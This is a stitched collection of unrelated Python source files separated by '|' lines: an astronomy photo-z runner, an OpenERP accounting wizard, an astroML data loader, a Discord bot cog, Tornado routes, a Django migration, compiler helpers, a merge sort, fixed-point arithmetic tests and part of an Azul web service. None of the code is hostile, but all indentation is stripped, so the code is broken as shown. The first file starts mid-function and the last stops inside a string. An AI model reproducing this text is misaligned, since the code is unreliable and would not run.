pz.inform_dict = run_dict['run_params']['inform_options']
if pz.inform_dict['load_model']:
# note: specific options set in subclasss func def
pz.load_pretrained_model()
else:
trainfile = pz.trainfile
train_fmt = trainfile.split(".")[-1]
training_data = io.read(trainfile,
None,
train_fmt,
)[pz.groupname]
pz.inform(training_data)
if 'run_name' in run_dict['run_params']:
outfile = run_dict['run_params']['run_name'] + '.hdf5'
tmpfile = "temp_" + outfile
else:
outfile = 'output.hdf5'
if pz.output_format == 'qp':
tmploc = os.path.join(pz.outpath, name, tmpfile)
outfile = run_dict['run_params']['run_name'] + "_qp.hdf5"
saveloc = os.path.join(pz.outpath, name, outfile)
for chunk, (start, end, data) in enumerate(io.iterHdf5ToDict(pz.testfile,
pz._chunk_size,
'photometry')):
pz_data_chunk = pz.estimate(data)
if chunk == 0:
if pz.output_format == 'qp':
group, outf = pz_data_chunk.initializeHdf5Write(saveloc, pz.num_rows)
else:
_, outf = io.initializeHdf5Write(saveloc, None, zmode=((pz.num_rows,), 'f4'),
pz_pdf=((pz.num_rows, pz.nzbins), 'f4'))
if pz.output_format == 'qp':
pz_data_chunk.writeHdf5Chunk(group, start, end)
else:
io.writeDictToHdf5Chunk(outf, pz_data_chunk, start, end)
print("writing " + name + f"[{start}:{end}]")
num_chunks = end // pz._chunk_size
if end % pz._chunk_size > 0:
num_chunks += 1
if pz.output_format == 'qp':
pz_data_chunk.finalizeHdf5Write(outf)
else:
io.finalizeHdf5Write(outf, zgrid=pz.zgrid)
print("finished")
if __name__ == "__main__":
main(sys.argv)
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class validate_account_move(osv.osv_memory):
_name = "validate.account.move"
_description = "Validate Account Move"
_columns = {
'journal_ids': fields.many2many('account.journal', 'wizard_validate_account_move_journal', 'wizard_id', 'journal_id', 'Journal', required=True),
'period_ids': fields.many2many('account.period', 'wizard_validate_account_move_period', 'wizard_id', 'period_id', 'Period', required=True, domain=[('state','<>','done')]),
}
def validate_move(self, cr, uid, ids, context=None):
obj_move = self.pool.get('account.move')
if context is None:
context = {}
data = self.read(cr, uid, ids[0], context=context)
ids_move = obj_move.search(cr, uid, [('state','=','draft'),('journal_id','in',tuple(data['journal_ids'])),('period_id','in',tuple(data['period_ids']))], order='date')
if not ids_move:
raise osv.except_osv(_('Warning!'), _('Specified journals do not have any account move entries in draft state for the specified periods.'))
obj_move.button_validate(cr, uid, ids_move, context=context)
return {'type': 'ir.actions.act_window_close'}
class validate_account_move_lines(osv.osv_memory):
_name = "validate.account.move.lines"
_description = "Validate Account Move Lines"
def validate_move_lines(self, cr, uid, ids, context=None):
obj_move_line = self.pool.get('account.move.line')
obj_move = self.pool.get('account.move')
move_ids = []
if context is None:
context = {}
data_line = obj_move_line.browse(cr, uid, context['active_ids'], context)
for line in data_line:
if line.move_id.state=='draft':
move_ids.append(line.move_id.id)
move_ids = list(set(move_ids))
if not move_ids:
raise osv.except_osv(_('Warning!'), _('Selected Entry Lines does not have any account move entries in draft state.'))
obj_move.button_validate(cr, uid, move_ids, context)
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
from typing import Dict, Any
from final_filter.abc_filtering_module import FilteringModule
class PerplexityModule(FilteringModule):
def __init__(self, threshold: float):
self.threshold = threshold
def validate(self, cluster: Dict[str, Any]) -> bool:
return cluster["perplexity"] <= self.threshold
def get_name(self):
return f"PerplexityModule - threshold = {self.threshold}"
|
import os
from cStringIO import StringIO
import tarfile
import numpy as np
from . import get_data_home
from tools import download_with_progress_bar
TARGETLIST_URL = ("http://www.astro.washington.edu/users/ivezic/"
"linear/allDataFinal/allLINEARfinal_targets.dat")
DATA_URL = ("http://www.astro.washington.edu/users/ivezic/"
"linear/allDataFinal/allLINEARfinal_dat.tar.gz")
# old version of the data
#GENEVA_URL = ("http://www.astro.washington.edu/users/ivezic/"
# "DMbook/data/LINEARattributes.dat"
#GENEVA_ARCHIVE = 'LINEARattributes.npy'
#ARCHIVE_DTYPE = [(s, 'f8') for s in ('RA', 'Dec', 'ug', 'gi', 'iK',
# 'JK', 'logP', 'amp', 'skew')]
GENEVA_URL = ("http://www.astro.washington.edu/users/ivezic/"
"DMbook/data/LINEARattributesFinalApr2013.dat")
GENEVA_ARCHIVE = 'LINEARattributesFinalApr2013.npy'
ARCHIVE_DTYPE = ([(s, 'f8') for s in ('RA', 'Dec', 'ug', 'gi', 'iK',
'JK', 'logP', 'amp', 'skew',
'kurt', 'magMed', 'nObs')]
+ [('LCtype', 'i4'), ('LINEARobjectID', '|S20')])
target_names = ['objectID', 'raLIN', 'decLIN', 'raSDSS', 'decSDSS', 'r',
'ug', 'gr', 'ri', 'iz', 'JK', '<mL>', 'std', 'rms',
'Lchi2', 'LP1', 'phi1', 'S', 'prior']
class LINEARdata:
"""A container class for the linear dataset.
Because the dataset is often not needed all at once, this class
offers tools to access just the needed components
Example
-------
>>> data = fetch_LINEAR_sample()
>>> lightcurve = data[data.ids[0]]
"""
@staticmethod
def _name_to_id(name):
return int(name.split('.')[0])
@staticmethod
def _id_to_name(id):
return str(id) + '.dat'
def __init__(self, data_file, targetlist_file):
self.targets = np.recfromtxt(targetlist_file)
self.targets.dtype.names = target_names
self.dataF = tarfile.open(data_file)
self.ids = np.array(map(self._name_to_id, self.dataF.getnames()))
# rearrange targets so lists are in the same order
self.targets = self.targets[self.targets['objectID'].argsort()]
ind = self.targets['objectID'].searchsorted(self.ids)
self.targets = self.targets[ind]
def get_light_curve(self, id):
"""Get a light curve with the given id.
Parameters
----------
id: integer
LINEAR id of the desired object
Returns
-------
lightcurve: ndarray
a size (n_observations, 3) light-curve.
columns are [MJD, flux, flux_err]
"""
return self[id]
def get_target_parameter(self, id, param):
"""Get a target parameter associated with the given id.
Parameters
----------
id: integer
LINEAR id of the desired object
param: string
parameter name of the desired object (see below)
Returns
-------
val: scalar
value of the requested target parameter
Notes
-----
Target parameters are one of the following:
['objectID', 'raLIN', 'decLIN', 'raSDSS', 'decSDSS', 'r',
'ug', 'gr', 'ri', 'iz', 'JK', '<mL>', 'std', 'rms',
'Lchi2', 'LP1', 'phi1', 'S', 'prior']
"""
i = np.where(self.targets['objectID'] == id)[0]
try:
val = self.targets[param][i[0]]
except:
raise KeyError(id)
return val
def __getitem__(self, id):
try:
lc = np.loadtxt(self.dataF.extractfile(self._id_to_name(id)))
except:
raise KeyError(id)
return lc
def fetch_LINEAR_sample(data_home=None, download_if_missing=True):
"""Loader for LINEAR data sample
Parameters
----------
data_home : optional, default=None
Specify another download and cache folder for the datasets. By default
all scikit learn data is stored in '~/astroML_data' subfolders.
download_if_missing : optional, default=True
If False, raise a IOError if the data is not locally available
instead of trying to download the data from the source site.
Returns
-------
data : LINEARdata object
A custom object which provides access to 7010 selected LINEAR light
curves.
"""
data_home = get_data_home(data_home)
if not os.path.exists(data_home):
os.makedirs(data_home)
targetlist_file = os.path.join(data_home, os.path.basename(TARGETLIST_URL))
data_file = os.path.join(data_home, os.path.basename(DATA_URL))
if not os.path.exists(targetlist_file):
if not download_if_missing:
raise IOError('data not present on disk. '
'set download_if_missing=True to download')
targets = download_with_progress_bar(TARGETLIST_URL)
open(targetlist_file, 'wb').write(targets)
if not os.path.exists(data_file):
if not download_if_missing:
raise IOError('data not present on disk. '
'set download_if_missing=True to download')
databuffer = download_with_progress_bar(DATA_URL)
open(data_file, 'wb').write(databuffer)
return LINEARdata(data_file, targetlist_file)
def fetch_LINEAR_geneva(data_home=None, download_if_missing=True):
"""Loader for LINEAR geneva data.
This supplements the LINEAR data above with well-determined periods
and other light curve characteristics.
Parameters
----------
data_home : optional, default=None
Specify another download and cache folder for the datasets. By default
all scikit learn data is stored in '~/astroML_data' subfolders.
download_if_missing : optional, default=True
If False, raise a IOError if the data is not locally available
instead of trying to download the data from the source site.
Returns
-------
data : record array
data on 7000+ LINEAR stars from the Geneva catalog
"""
data_home = get_data_home(data_home)
if not os.path.exists(data_home):
os.makedirs(data_home)
archive_file = os.path.join(data_home, GENEVA_ARCHIVE)
if not os.path.exists(archive_file):
if not download_if_missing:
raise IOError('data not present on disk. '
'set download_if_missing=True to download')
databuffer = download_with_progress_bar(GENEVA_URL)
data = np.loadtxt(StringIO(databuffer), dtype=ARCHIVE_DTYPE)
np.save(archive_file, data)
else:
data = np.load(archive_file)
return data
|
from snovault import (
CONNECTION,
upgrade_step
)
@upgrade_step('chip_peak_enrichment_quality_metric', '1', '2')
def chip_peak_enrichment_quality_metric_1_2(value, system):
if 'FRiP' in value:
value['frip'] = value['FRiP']
value.pop('FRiP')
|
import logging
import arrow
from dateutil.relativedelta import relativedelta
from discord import Embed
from discord.commands import ApplicationContext, slash_command
from discord.ext import commands
from bot import start_time
from bot.bot import Bot
from bot.core import settings
from bot.utils.formatters import color_level
log = logging.getLogger(__name__)
class Ping(commands.Cog):
"""Get info about the bot's ping and uptime."""
def __init__(self, bot: Bot):
self.bot = bot
@slash_command(guild_ids=settings.guild_ids)
async def ping(self, ctx: ApplicationContext) -> None:
"""🏓 Ping the bot to see its latency and uptime."""
difference = relativedelta(arrow.utcnow() - start_time)
uptime: str = start_time.shift(
seconds=-difference.seconds,
minutes=-difference.minutes,
hours=-difference.hours,
days=-difference.days
).humanize()
latency = round(self.bot.latency * 1000)
embed = Embed(
colour=color_level(latency),
description=f"• Gateway Latency: **{latency}ms**\n• Start time: **{uptime}**"
)
await ctx.respond(embed=embed)
def setup(bot: Bot) -> None:
"""Loads the Ping cog."""
bot.add_cog(Ping(bot))
|
from app.clients.email.govdelivery_client import govdelivery_status_map
govdelivery_webhook_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "x-www-form-urlencoded POST from Granicus with delivery status define at https://developer.govdelivery.com/api/tms/resource/webhooks/", # noqa: E501
"type": "object",
"title": "POST data for /notifications/govdelivery",
"properties": {
"sid": {"type": "string"},
"message_url": {"type": "string", "format": "uri"},
"recipient_url": {"type": "string", "format": "uri"},
"status": {"enum": govdelivery_status_map.keys()},
"message_type": {"enum": ["sms", "email"]},
"completed_at": {"type": "string"},
"error_message": {"type": "string"}
},
"required": ["message_url", "status", "sid", "message_type"]
}
|
# Initialize our dictionary.
tokitsukaze = {}
# Process our input.
tokitsukazeHP = int(input())
# Get our ideal value of Tokitsukaze's rank by brute-forcing through the input received.
for i in range(0, 3):
tokitsukazeCategory = (int(tokitsukazeHP + i)) % 4
if tokitsukazeCategory == 0:
tokitsukaze[i] = 'D'
elif tokitsukazeCategory == 1:
tokitsukaze[i] = 'A'
elif tokitsukazeCategory == 2:
tokitsukaze[i] = 'C'
else:
tokitsukaze[i] = 'B'
# Sort the dictionary by its value.
sorted_tokitsukaze = sorted(tokitsukaze.items(), key=lambda x: x[1])
# Unpack our tuple to get the answer.
tokitsukaze_added, tokitsukaze_rank = sorted_tokitsukaze[0]
# Print our answer.
print(tokitsukaze_added, tokitsukaze_rank)
|
from collections import OrderedDict
from tornado.web import RequestHandler
from tornado.locale import get_supported_locales
from .dispatch import route, LanguageCookieMixin
from . import pageutils
import libcard2.localization
@route("/")
class Slash(LanguageCookieMixin):
def get(self):
self.render("home.html")
@route("/(?:idols|idol)/?")
@route("/idols/(unit)/([0-9]+)")
@route("/idols/(group)/([0-9]+)")
class IdolsRoot(LanguageCookieMixin):
def get(self, specific=None, specific_value=None):
nav_crumb_level = 0
if specific == "unit":
members = self.settings["master"].lookup_member_list(subunit=int(specific_value))
nav_crumb_level = 2
elif specific == "group":
members = self.settings["master"].lookup_member_list(group=int(specific_value))
nav_crumb_level = 1
else:
members = self.settings["master"].lookup_member_list()
tlbatch = set()
groups = OrderedDict()
for mem in members:
if mem.group_name in groups:
groups[mem.group_name].append(mem)
else:
groups[mem.group_name] = [mem]
tlbatch.update(mem.get_tl_set())
self._tlinject_base = self.settings["string_access"].lookup_strings(
tlbatch, self.get_user_dict_preference()
)
self.render("member_list.html", member_groups=groups, nav_crumb_level=nav_crumb_level)
@route("/lives")
class LiveRoot(LanguageCookieMixin):
def get(self):
songs = self.settings["master"].lookup_song_list()
tlbatch = set()
groups = OrderedDict()
for s in songs:
if s.member_group_name in groups:
groups[s.member_group_name].append(s)
else:
groups[s.member_group_name] = [s]
tlbatch.update(s.get_tl_set())
self._tlinject_base = self.settings["string_access"].lookup_strings(
tlbatch, self.get_user_dict_preference()
)
self.render("song_list.html", live_groups=groups, nav_crumb_level=0)
@route("/live(?:s)?/([0-9]+)(/.*)?")
class LiveSingle(LanguageCookieMixin):
def get(self, live_id, _slug=None):
song = self.settings["master"].lookup_song_difficulties(int(live_id))
tlbatch = song.get_tl_set()
self._tlinject_base = self.settings["string_access"].lookup_strings(
tlbatch, self.get_user_dict_preference()
)
self.render("song.html", songs=[song])
@route("/accessory_skills")
class Accessories(LanguageCookieMixin):
def get(self):
skills = self.settings["master"].lookup_all_accessory_skills()
tlbatch = set()
for skill in skills:
tlbatch.update(skill.get_tl_set())
self._tlinject_base = self.settings["string_access"].lookup_strings(
tlbatch, self.get_user_dict_preference()
)
self.render("accessories.html", skills=skills)
@route("/hirameku_skills")
class Hirameku(LanguageCookieMixin):
def get(self):
skills = self.settings["master"].lookup_all_hirameku_skills()
skills.sort(key=lambda x: (x.levels[0][2], x.rarity))
tlbatch = set()
for skill in skills:
tlbatch.update(skill.get_tl_set())
self._tlinject_base = self.settings["string_access"].lookup_strings(
tlbatch, self.get_user_dict_preference()
)
self.render("accessories.html", skills=skills)
@route("/experiments")
class ExperimentPage(LanguageCookieMixin):
def get(self):
self.render("experiments.html")
@route(r"/([a-z]+)/story/(.+)")
class StoryViewerScaffold(LanguageCookieMixin):
def get(self, region, script):
self.render(
"story_scaffold.html",
region=region,
basename=script,
asset_path=pageutils.sign_object(self, f"adv/{script}", "json"),
)
@route(r"/api/v1/(?:[^/]*)/skill_tree/([0-9]+).json")
class APISkillTree(RequestHandler):
def get(self, i):
items, shape, locks = self.settings["master"].lookup_tt(int(i))
items["items"] = {
k: (pageutils.image_url_reify(self, v[0], "png"), v[1])
for k, v in items["items"].items()
}
self.write({"id": int(i), "tree": shape, "lock_levels": locks, "item_sets": items})
@route(r"/api/private/search/bootstrap.json")
class APISearchBootstrap(RequestHandler):
def gen_sd(self):
sd = libcard2.localization.skill_describer_for_locale(self.locale.code)
desc_fmt_args = {"var": "", "let": "", "end": "", "value": "X"}
word_set = {}
for skill_id, formatter in sd.skill_effect.data.items():
if callable(formatter):
wl = formatter(**desc_fmt_args)
else:
wl = formatter.format(**desc_fmt_args)
def get(self):
return
@route(r"/api/private/langmenu.json")
class APILanguageMenu(RequestHandler):
def get(self):
dicts = [{
"code": self.settings["string_access"].master.language,
"name": self.locale.translate("DefaultDictionaryName")
}]
dicts.extend([{
"code": x.code,
"name": x.name,
} for x in self.settings["string_access"].choices])
self.write({
"languages": list(get_supported_locales()),
"dictionaries": dicts
})
|
# Generated by Django 2.1.7 on 2019-05-12 19:34
from django.db import migrations, models
from django.contrib.postgres.fields import JSONField
class Migration(migrations.Migration):
dependencies = [
('device_registry', '0024_fix_scan_info_content'),
]
operations = [
migrations.AddField(
model_name='deviceinfo',
name='app_armor_enabled',
field=models.BooleanField(blank=True, null=True),
),
migrations.AddField(
model_name='deviceinfo',
name='selinux_state',
field=JSONField(default=dict),
),
]
|
# coding: utf-8
"""
Tools to interact with toolchains GCC, Clang, and other UNIX compilers
"""
from .util import _create_shared_base, _libext
LIBEXT = _libext()
def _obj_ext():
return '.o'
def _obj_cmd(source, toolchain, options):
obj_ext = _obj_ext()
return '{} -c -O3 -o {} {} -fPIC -std=c99 {}' \
.format(toolchain, source + obj_ext, source + '.c', ' '.join(options))
def _lib_cmd(objects, target, lib_ext, toolchain, options):
return '{} -shared -O3 -o {} {} -std=c99 {}' \
.format(toolchain, target + lib_ext,
' '.join(objects), ' '.join(options))
def _create_shared(dirpath, toolchain, recipe, nthread, options, verbose): # pylint: disable=R0913
options += ['-lm']
# Specify command to compile an object file
recipe['object_ext'] = _obj_ext()
recipe['library_ext'] = LIBEXT
# pylint: disable=C0111
def obj_cmd(source):
return _obj_cmd(source, toolchain, options)
def lib_cmd(objects, target):
return _lib_cmd(objects, target, LIBEXT, toolchain, options)
recipe['create_object_cmd'] = obj_cmd
recipe['create_library_cmd'] = lib_cmd
recipe['initial_cmd'] = ''
return _create_shared_base(dirpath, recipe, nthread, verbose)
__all__ = []
|
"""
In computer science, merge sort (also commonly spelled mergesort) is an efficient,
general-purpose, comparison-based sorting algorithm.
Most implementations produce a stable sort,
which means that the implementation preserves the input order of equal elements in the sorted output.
Mergesort is a divide and conquer algorithm that was invented by John von Neumann in 1945.
"""
def _merge(left, right):
"""
Function merges left and right parts
Args:
left: left part of array
right: right part of array
Returns:
Sorted and merged left + right parts
"""
merge_result = []
i = 0
j = 0
while i < len(left) and j < len(right):
if left[i] <= right[j]:
merge_result += [left[i]]
i += 1
else:
merge_result += [right[j]]
j += 1
merge_result += left[i:len(left)]
merge_result += right[j:len(right)]
return merge_result
def merge_sort(array):
"""
Sort array via merge sort algorithm
Args:
array: list of elements to be sorted
Returns:
Sorted list of elements
Examples:
>>> merge_sort([1, -10, 21, 3, 5])
[-10, 1, 3, 5, 21]
"""
if len(array) == 1:
return array[:]
mid = len(array) // 2
left = merge_sort(array[:mid])
right = merge_sort(array[mid:])
sort_result = _merge(left, right)
return sort_result
|
from math import ceil, floor
from pygears.typing import Fixp, Ufixp, Uint, Int
def test_abs():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
q3_4 = Fixp[3, 4]
assert abs(uq2_3.max) == uq2_3.max
assert abs(q2_3.min) == q3_4(abs(float(q2_3.min)))
def test_add():
uq2_3 = Ufixp[2, 3]
uq2_4 = Ufixp[2, 4]
uq3_4 = Ufixp[3, 4]
uq3_5 = Ufixp[3, 5]
uq4_5 = Ufixp[4, 5]
uq4_6 = Ufixp[4, 6]
q2_3 = Fixp[2, 3]
q2_4 = Fixp[2, 4]
q3_4 = Fixp[3, 4]
q3_5 = Fixp[3, 5]
q4_5 = Fixp[4, 5]
q4_6 = Fixp[4, 6]
q5_6 = Fixp[5, 6]
q5_7 = Fixp[5, 7]
assert uq2_3.quant + uq3_4.quant == uq4_5(float(uq2_3.quant) + float(uq3_4.quant))
assert uq2_3.max + uq3_4.max == uq4_5(11.0)
assert uq3_4.max + uq3_4.max == uq4_5(15.0)
assert uq2_4.quant + uq3_4.quant == uq4_6(float(uq2_4.quant) + float(uq3_4.quant))
assert uq2_4.max + uq3_4.max == uq4_6(11.25)
assert uq3_4.max + uq3_5.max == uq4_6(15.25)
assert q2_3.quant + q3_4.quant == q4_5(float(q2_3.quant) + float(q3_4.quant))
assert q2_3.max + q3_4.max == q4_5(5.0)
assert q3_4.max + q3_4.max == q4_5(7.0)
assert q2_4.quant + q3_4.quant == q4_6(float(q2_4.quant) + float(q3_4.quant))
assert q2_4.max + q3_4.max == q4_6(5.25)
assert q3_4.max + q3_5.max == q4_6(7.25)
assert uq2_3.quant + q3_4.quant == q4_5(float(uq2_3.quant) + float(q3_4.quant))
assert uq2_3.max + q3_4.max == q4_5(7.0)
assert q2_3.max + uq3_4.max == q5_6(9.0)
assert uq3_4.max + q3_4.max == q5_6(11.0)
assert uq2_4.quant + q3_4.quant == q4_6(float(uq2_4.quant) + float(q3_4.quant))
assert uq2_4.max + q3_4.max == q4_6(7.25)
assert uq3_4.max + q3_5.max == q5_7(11.25)
assert q2_4.max + uq3_4.max == q5_7(9.25)
assert q2_3.min + q3_4.max == q4_5(1.5)
assert q3_4.min + q3_4.max == q4_5(-0.5)
assert q2_4.min + q3_4.max == q4_6(1.5)
assert q3_4.min + q3_5.max == q4_6(-0.25)
assert uq2_3.max + q3_4.min == q4_5(-0.5)
assert q2_3.min + uq3_4.max == q5_6(5.5)
assert uq3_4.max + q3_4.min == q5_6(3.5)
assert uq2_4.max + q3_4.min == q4_6(-0.25)
assert uq3_4.max + q3_5.min == q5_7(3.5)
assert q2_4.min + uq3_4.max == q5_7(5.5)
def test_ceil():
uq2_4 = Ufixp[2, 4]
q2_3 = Fixp[2, 3]
uq4_4 = Ufixp[4, 4]
q6_3 = Fixp[6, 3]
assert ceil(uq2_4.max) == Ufixp[3, 5](4.0)
assert ceil(uq2_4(3.25)) == Ufixp[3, 5](4.0)
assert ceil(q2_3.min) == Fixp[3, 4](-2.0)
assert ceil(q2_3(-1.5)) == Fixp[3, 4](-1.0)
assert ceil(uq4_4.max) == uq4_4.max
assert ceil(q6_3.min) == q6_3.min
def test_floor():
uq2_4 = Ufixp[2, 4]
q2_3 = Fixp[2, 3]
uq4_4 = Ufixp[4, 4]
q6_3 = Fixp[6, 3]
assert floor(uq2_4.max) == uq2_4(3.0)
assert floor(uq2_4(3.25)) == uq2_4(3.0)
assert floor(q2_3.min) == q2_3(-2.0)
assert floor(q2_3(-1.5)) == q2_3(-2.0)
assert floor(uq4_4.max) == uq4_4.max
assert floor(q6_3.min) == q6_3.min
def test_ge():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
assert uq2_3(1.5) >= q2_3(1.5)
assert q2_3(1.5) >= uq2_3(1.5)
assert uq2_3.max >= q2_3.min
assert q2_3.max >= uq2_3.min
def test_gt():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
assert uq2_3(2.0) > q2_3(1.5)
assert q2_3(1.5) > uq2_3(1.0)
assert uq2_3.max > q2_3.min
assert q2_3.max > uq2_3.min
def test_le():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
assert uq2_3(1.5) <= q2_3(1.5)
assert q2_3(1.5) <= uq2_3(1.5)
assert uq2_3.min <= q2_3.max
assert q2_3.min <= uq2_3.max
def test_lt():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
assert uq2_3(1.0) < q2_3(1.5)
assert q2_3(1.0) < uq2_3(1.5)
assert uq2_3.min < q2_3.max
assert q2_3.min < uq2_3.max
def test_lshift():
uq2_3 = Ufixp[2, 3]
uq4_3 = Ufixp[4, 3]
q2_3 = Fixp[2, 3]
q4_3 = Fixp[4, 3]
assert uq2_3.max << 2 == uq4_3(14.0)
assert q2_3.min << 2 == q4_3.min
assert uq2_3.max << 0 == uq2_3.max
assert q2_3.min << 0 == q2_3.min
def test_neg():
uq2_3 = Ufixp[2, 3]
q2_3 = Fixp[2, 3]
q3_4 = Fixp[3, 4]
assert -uq2_3.max == q3_4(-float(uq2_3.max))
assert -q2_3.min == q3_4(-float(q2_3.min))
def test_rshift():
uq2_3 = Ufixp[2, 3]
uq4_3 = Ufixp[4, 3]
q2_3 = Fixp[2, 3]
q4_3 = Fixp[4, 3]
assert uq4_3(14.0) >> 2 == uq2_3.max
assert q4_3.min >> 2 == q2_3.min
assert uq2_3.max >> 0 == uq2_3.max
assert q2_3.min >> 0 == q2_3.min
def test_round():
uq2_4 = Ufixp[2, 4]
q2_3 = Fixp[2, 3]
uq4_4 = Ufixp[4, 4]
q6_3 = Fixp[6, 3]
assert round(uq2_4.max) == Ufixp[3, 5](4.0)
assert round(uq2_4(3.25)) == Ufixp[3, 5](3.0)
assert round(q2_3.min) == Fixp[3, 4](-2.0)
assert round(q2_3(-1.5)) == Fixp[3, 4](-1.0)
assert round(uq4_4.max) == uq4_4.max
assert round(q6_3.min) == q6_3.min
def test_sub_val():
uq2_3 = Ufixp[2, 3]
uq2_4 = Ufixp[2, 4]
uq3_4 = Ufixp[3, 4]
uq3_5 = Ufixp[3, 5]
q2_3 = Fixp[2, 3]
q2_4 = Fixp[2, 4]
q3_4 = Fixp[3, 4]
q3_5 = Fixp[3, 5]
q4_5 = Fixp[4, 5]
q4_6 = Fixp[4, 6]
q5_6 = Fixp[5, 6]
q5_7 = Fixp[5, 7]
assert uq2_3.quant - uq3_4.quant == q4_5(0.0)
assert uq2_3.min - uq3_4.max == q4_5(-7.5)
assert uq2_4.quant - uq3_4.quant == q4_6(float(uq2_4.quant) - float(uq3_4.quant))
assert uq2_4.min - uq3_4.max == q4_6(-7.5)
assert uq3_4.min - uq3_5.max == q4_6(-7.75)
assert q2_3.quant - q3_4.quant == q4_5(0.0)
assert q2_3.min - q3_4.max == q4_5(-5.5)
assert q3_4.min - q3_4.max == q4_5(-7.5)
assert q3_4.max - q3_4.min == q4_5(7.5)
assert q2_4.quant - q3_4.quant == q4_6(float(q2_4.quant) - float(q3_4.quant))
assert q2_4.min - q3_4.max == q4_6(-5.5)
assert q2_4.max - q3_4.min == q4_6(5.75)
assert q3_4.min - q3_5.max == q4_6(-7.75)
assert q3_4.max - q3_5.min == q4_6(7.5)
assert uq2_3.quant - q3_4.quant == q4_5(0.0)
assert uq2_3.max - q3_4.min == q4_5(7.5)
assert q2_3.min - uq3_4.max == q5_6(-9.5)
assert uq3_4.max - q3_4.min == q5_6(11.5)
assert q3_4.min - uq3_4.max == q5_6(-11.5)
assert uq2_4.quant - q3_4.quant == q4_6(float(uq2_4.quant) - float(q3_4.quant))
assert uq2_4.max - q3_4.min == q4_6(7.75)
assert uq3_4.max - q3_5.min == q5_7(11.5)
assert q2_4.min - uq3_4.max == q5_7(-9.5)
|
import base64
import hashlib
from inspect import (
signature,
)
import json
import logging.config
import re
from typing import (
Any,
Callable,
Mapping,
Optional,
Sequence,
Union,
)
import urllib.parse
from botocore.exceptions import (
ClientError,
)
import chalice
# noinspection PyPackageRequirements
from chalice import (
BadRequestError,
ChaliceViewError,
Response,
UnauthorizedError,
)
import chevron
from furl import (
furl,
)
from more_itertools import (
one,
)
from azul import (
CatalogName,
RequirementError,
cache,
cached_property,
config,
drs,
)
from azul.auth import (
OAuth2,
)
from azul.chalice import (
AzulChaliceApp,
)
from azul.drs import (
AccessMethod,
)
from azul.health import (
HealthController,
)
from azul.logging import (
configure_app_logging,
)
from azul.openapi import (
application_json,
format_description,
params,
responses,
schema,
)
from azul.plugins import (
MetadataPlugin,
ServiceConfig,
)
from azul.plugins.metadata.hca.transform import (
value_and_unit,
)
from azul.portal_service import (
PortalService,
)
from azul.service import (
BadArgumentException,
)
from azul.service.catalog_controller import (
CatalogController,
)
from azul.service.drs_controller import (
DRSController,
)
from azul.service.elasticsearch_service import (
Pagination,
)
from azul.service.manifest_controller import (
ManifestController,
)
from azul.service.manifest_service import (
CurlManifestGenerator,
ManifestFormat,
)
from azul.service.repository_controller import (
RepositoryController,
)
from azul.service.storage_service import (
StorageService,
)
from azul.strings import (
pluralize,
)
from azul.types import (
AnyJSON,
JSON,
LambdaContext,
MutableJSON,
PrimitiveJSON,
reify,
)
log = logging.getLogger(__name__)
spec = {
'openapi': '3.0.1',
'info': {
'title': config.service_name,
'description': format_description(f'''
# Overview
Azul is a REST web service for querying metadata associated with
both experimental and analysis data from a data repository. In order
to deliver response times that make it suitable for interactive use
cases, the set of metadata properties that it exposes for sorting,
filtering, and aggregation is limited. Azul provides a uniform view
of the metadata over a range of diverse schemas, effectively
shielding clients from changes in the schema as they occur over
time. It does so, however, at the expense of detail in the set of
metadata properties it exposes and in the accuracy with which it
aggregates them.
Azul denormalizes and aggregates metadata into several different
indices for selected entity types:
- [projects](#operations-Index-get_index_projects)
- [samples](#operations-Index-get_index_samples)
- [files](#operations-Index-get_index_files)
- [bundles](#operations-Index-get_index_bundles)
This set of indexes forms a catalog. There is a default catalog
called `{config.default_catalog}` which will be used unless a
different catalog name is specified using the `catalog` query
parameter. Metadata from different catalogs is completely
independent: a response obtained by querying one catalog does not
necessarily correlate to a response obtained by querying another
one. Two catalogs can contain metadata from the same source or
different sources. It is only guaranteed that the body of a
response by any given endpoint adheres to one schema,
independently of what catalog was specified in the request.
Azul provides the ability to download data and metadata via the
[Manifests](#operations-tag-Manifests) endpoints. The
`{ManifestFormat.curl.value}` format manifests can be used to
download data files. Other formats provide various views of the
metadata. Manifests can be generated for a selection of files using
filters. These filters are interchangeable with the filters used by
the [Index](#operations-tag-Index) endpoints.
Azul also provides a
[summary](#operations-Index-get_index_summary) view of
indexed data.
## Data model
Any index, when queried, returns a JSON array of hits. Each hit
represents a metadata entity. Nested in each hit is a summary of the
properties of entities associated with the hit. An entity is
associated either by a direct edge in the original metadata graph,
or indirectly as a series of edges. The nested properties are
grouped by the type of the associated entity. The properties of all
data files associated with a particular sample, for example, are
listed under `hits[*].files` in a `/index/samples` response. It
is important to note that while each _hit_ represents a discrete
entity, the properties nested within that hit are the result of an
aggregation over potentially many associated entities.
To illustrate this, consider a data file that is part of two
projects (a project is a group of related experiments, typically by
one laboratory, institution or consortium). Querying the `files`
index for this file yields a hit looking something like:
```
{{
"projects": [
{{
"projectTitle": "Project One"
"laboratory": ...,
...
}},
{{
"projectTitle": "Project Two"
"laboratory": ...,
...
}}
],
"files": [
{{
"format": "pdf",
"name": "Team description.pdf",
...
}}
]
}}
```
This example hit contains two kinds of nested entities (a hit in
an actual Azul response will contain more): There are the two
projects entities, and the file itself. These nested entities
contain selected metadata properties extracted in a consistent way.
This makes filtering and sorting simple.
Also notice that there is only one file. When querying a particular
index, the corresponding entity will always be a singleton like
this.
'''),
# Version should be updated in any PR tagged API with a major version
